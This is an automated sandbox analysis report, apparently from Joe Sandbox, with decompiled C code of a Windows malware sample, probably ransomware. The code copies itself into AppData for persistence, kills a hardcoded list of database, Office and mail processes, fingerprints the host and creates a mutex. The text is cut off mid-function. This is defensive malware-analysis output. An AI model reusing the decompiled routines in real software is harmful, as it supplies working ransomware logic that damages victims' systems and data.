				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0FE681F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0FE682B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0FE681F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0FE62890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0FE62960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x0fe62ad6
0x0fe62aea
0x0fe62af0
0x0fe62af4
0x0fe62af6
0x0fe62b00
0x0fe62b1c
0x0fe62b1e
0x0fe62b1e
0x0fe62b02
0x0fe62b02
0x0fe62b02
0x0fe62b08
0x0fe62b10
0x0fe62b12
0x0fe62b14
0x0fe62b14
0x0fe62b28
0x0fe62b2c
0x0fe62b38
0x0fe62b3e
0x0fe62b43
0x0fe62b48
0x0fe62b4a
0x0fe62b55
0x0fe62b62
0x0fe62b67
0x0fe62b6c
0x0fe62b75
0x0fe62b89
0x0fe62b8e
0x0fe62b9c
0x0fe62ba2
0x0fe62ba5
0x0fe62ba7
0x0fe62bac
0x0fe62bae
0x0fe62be4
0x0fe62bec
0x0fe62bf4
0x0fe62bf6
0x0fe62bfd
0x0fe62c02
0x0fe62c05
0x0fe62c07
0x00000000
0x00000000
0x0fe62c0f
0x0fe62c11
0x0fe62c16
0x0fe62c1d
0x0fe62c2c
0x0fe62c2c
0x0fe62c2c
0x0fe62c2e
0x0fe62c2e
0x0fe62c2f
0x0fe62c35
0x0fe62c3b
0x00000000
0x0fe62c3d
0x0fe62c25
0x0fe62c2a
0x00000000
0x00000000
0x00000000
0x0fe62c2a
0x0fe62bb6
0x0fe62bb8
0x0fe62bbd
0x0fe62bc4
0x0fe62bd3
0x0fe62bd3
0x0fe62bd3
0x0fe62bd5
0x0fe62bd5
0x00000000
0x0fe62bd5
0x0fe62bcc
0x0fe62bd1
0x00000000
0x00000000
0x00000000
0x0fe62b4c
0x0fe62b4c
0x0fe62c40
0x0fe62c40
0x0fe62c45
0x0fe62c47
0x0fe62c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FE62AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FE62B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0FE62B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FE62B7D

Part of subcall function 0FE682B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE682CD
Part of subcall function 0FE682B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FE682FB
Part of subcall function 0FE682B0: GetModuleHandleA.KERNEL32(?), ref: 0FE6834F
Part of subcall function 0FE682B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE6835D
Part of subcall function 0FE682B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE6836C
Part of subcall function 0FE682B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683B5
Part of subcall function 0FE682B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE683C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FE62B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0FE62BE4
lstrcatW.KERNEL32(00000000,?), ref: 0FE62BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0FE62BF4
wsprintfW.USER32 ref: 0FE62C35
ExitThread.KERNEL32 ref: 0FE62C47

Strings

\Microsoft\, xrefs: 0FE62BDE
I, xrefs: 0FE62B6C
"%s", xrefs: 0FE62C2F
U, xrefs: 0FE62B75
AppData, xrefs: 0FE62B97
P, xrefs: 0FE62B55
.exe, xrefs: 0FE62BEE

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 03705a8b2d424b2f3eedcd95e1bdddbc933cb8970167f0acfbced16ff0817c1c
Instruction ID: 87d813ce185a0209a437330387984369e6f948058075a4c53680cdd6a92f89da
Opcode Fuzzy Hash: 03705a8b2d424b2f3eedcd95e1bdddbc933cb8970167f0acfbced16ff0817c1c
Instruction Fuzzy Hash: D141D6706443089FE700DF21EC49B9B7BD9EFC8799F041429F645A6282EB78D904CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 0FE648C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0FE648C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x0fe648c6
0x0fe648d3
0x0fe648db
0x0fe648e3
0x0fe648eb
0x0fe648f3
0x0fe648fb
0x0fe64903
0x0fe6490b
0x0fe64913
0x0fe6491b
0x0fe64923
0x0fe6492b
0x0fe64933
0x0fe6493b
0x0fe64943
0x0fe6494b
0x0fe64953
0x0fe6495b
0x0fe64963
0x0fe6496b
0x0fe64973
0x0fe6497b
0x0fe64983
0x0fe6498b
0x0fe64993
0x0fe6499b
0x0fe649a3
0x0fe649ae
0x0fe649b9
0x0fe649c4
0x0fe649cf
0x0fe649da
0x0fe649e5
0x0fe649f0
0x0fe649fb
0x0fe64a06
0x0fe64a11
0x0fe64a1c
0x0fe64a27
0x0fe64a32
0x0fe64a44
0x0fe64a48
0x0fe64a4c
0x0fe64a52
0x0fe64a56
0x0fe64a58
0x0fe64a61
0x0fe64a63
0x0fe64a65
0x0fe64a65
0x0fe64a61
0x0fe64a71
0x0fe64a71
0x0fe64a74
0x0fe64a74
0x0fe64a80
0x0fe64a85
0x0fe64a8d
0x0fe64a9b
0x0fe64a9f
0x0fe64aa4
0x0fe64ab1
0x0fe64ab1
0x0fe64a9f
0x0fe64abb
0x0fe64abc
0x0fe64abc
0x0fe64abf
0x0fe64ac4
0x0fe64aca
0x0fe64ad0
0x0fe64ad0
0x0fe64ad3
0x0fe64ad9
0x0fe64ae3
0x0fe64ae3
0x0fe64aea
0x0fe64af2

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0FE64A32
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0FE64A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FE64A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FE64A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FE64A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FE64AA4
CloseHandle.KERNEL32(00000000), ref: 0FE64AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FE64ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE64AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0FE64AEA

Strings

iqt, xrefs: 0FE64A85

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: iqt
API String ID: 3023235786-2805759263
Opcode ID: 46d2d8d589f4eca04ad32f4a05c1da75a5061d750b4f9e86328a1508386302a9
Instruction ID: da98943b1c48dccfaf92cd13bd5b9a9696052a101bd65f7b18de94449e88525f
Opcode Fuzzy Hash: 46d2d8d589f4eca04ad32f4a05c1da75a5061d750b4f9e86328a1508386302a9
Instruction Fuzzy Hash: 21516DB54893C89FC720CF11A44A74FBBE4FB827D9F506A1CE5985A252E7709C08CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FE647D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0FE63BC0: GetProcessHeap.KERNEL32(?,?,0FE64807,00000000,?,00000000,00000000), ref: 0FE63C5C

Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FE674B7
Part of subcall function 0FE67490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FE674E6
Part of subcall function 0FE67490: GetComputerNameW.KERNEL32 ref: 0FE674F0
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE67510
Part of subcall function 0FE67490: wsprintfW.USER32 ref: 0FE67551
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE6756E
Part of subcall function 0FE67490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
Part of subcall function 0FE67490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
Part of subcall function 0FE67490: RegCloseKey.KERNEL32(00000000), ref: 0FE675D2

Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67397
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673A2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673C1
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE673CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6482C
lstrcpyW.KERNEL32 ref: 0FE6484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64856
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE64881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FE6489B

Strings

Global\, xrefs: 0FE64849

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 8ade5fbd32b5646cb994755ee3102efc622bbfa4668aa36dc21a5117a8a23854
Instruction ID: f921e2a95b14d772ec60e8fa88038fd8a8610278eb4376992921e7c4a0f2d148
Opcode Fuzzy Hash: 8ade5fbd32b5646cb994755ee3102efc622bbfa4668aa36dc21a5117a8a23854
Instruction Fuzzy Hash: 9021F371AE031D7BE224A724DC4AF7F7A5CDB41BD5F500228F605A60C1AE987D0487E5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE64A78 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE64A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0fe64a78
0x0fe64a78
0x0fe64a80
0x0fe64a80
0x0fe64a85
0x0fe64a8d
0x0fe64a9b
0x0fe64a9f
0x0fe64aa4
0x0fe64ab1
0x0fe64ab1
0x0fe64a9f
0x0fe64abb
0x0fe64abc
0x0fe64abc
0x0fe64ac2
0x00000000
0x00000000
0x0fe64ac4
0x0fe64ac4
0x0fe64aca
0x0fe64ad0
0x0fe64ad0
0x0fe64ad5
0x0fe64a74
0x0fe64a80
0x00000000
0x00000000
0x00000000
0x0fe64a80
0x0fe64ad9
0x0fe64ae3
0x0fe64ae3
0x0fe64aea
0x0fe64af2
0x0fe64a80
0x0fe64a85
0x0fe64a8d
0x0fe64a9b
0x0fe64a9f
0x0fe64aa4
0x0fe64ab1
0x0fe64ab1
0x0fe64a9f
0x0fe64abb
0x0fe64abc
0x0fe64abc
0x0fe64abf

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FE64A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FE64A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FE64AA4
CloseHandle.KERNEL32(00000000), ref: 0FE64AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FE64ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE64AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0FE64AEA

Strings

iqt, xrefs: 0FE64A85

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: iqt
API String ID: 3573210778-2805759263
Opcode ID: 140725673cc4ec452fb6c4845f08ed120af7d5578b75709fa0cead1a34f580bb
Instruction ID: 21ca624fd695217b617adbc757687268d452022c9c6b9d80cdc2190f15645c2e
Opcode Fuzzy Hash: 140725673cc4ec452fb6c4845f08ed120af7d5578b75709fa0cead1a34f580bb
Instruction Fuzzy Hash: E2014E32540108BFD7209F11EC84B9B736DEF827E2F310134FD09A6081FB34A8148BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FE635C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE635C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0FE634F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						FindCloseChangeNotification(_t37); // executed
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

0x0fe635dc
0x0fe635df
0x0fe635e2
0x0fe635e9
0x0fe635eb
0x0fe635ef
0x0fe63600
0x0fe63616
0x0fe6361c
0x0fe63621
0x0fe63626
0x0fe63636
0x0fe63639
0x0fe6363b
0x0fe6363f
0x0fe6364c
0x0fe63654
0x0fe6365a
0x0fe6365f
0x0fe63661
0x0fe63661
0x0fe63662
0x0fe6366e
0x0fe6367f
0x0fe63682
0x0fe63682
0x0fe6365f
0x0fe6368d
0x0fe6368d
0x0fe63694
0x0fe63694
0x0fe636a2
0x0fe636b1
0x0fe635f6
0x0fe635f6
0x0fe635f6

APIs

VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,74716980), ref: 0FE635E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,747582B0), ref: 0FE63600
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0FE63616
GetFileSize.KERNEL32(00000000,00000000), ref: 0FE63626
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FE63639
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0FE6364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE6368D
FindCloseChangeNotification.KERNEL32(00000000), ref: 0FE63694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE636A2

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
String ID:
API String ID: 511603811-0
Opcode ID: ea65e1052e9181626f7fa8709067964a1c8917b5e09c4e955ef758ebb96a4546
Instruction ID: 5c35dac00c982c8e0717d2c492374179c9fc4c526f79eaf7792fe94a5ba5a694
Opcode Fuzzy Hash: ea65e1052e9181626f7fa8709067964a1c8917b5e09c4e955ef758ebb96a4546
Instruction Fuzzy Hash: F8210E71B803087FF7219B659C46FAF7B68EB45B65F200069F705B53C1CBB865108755

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE67D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
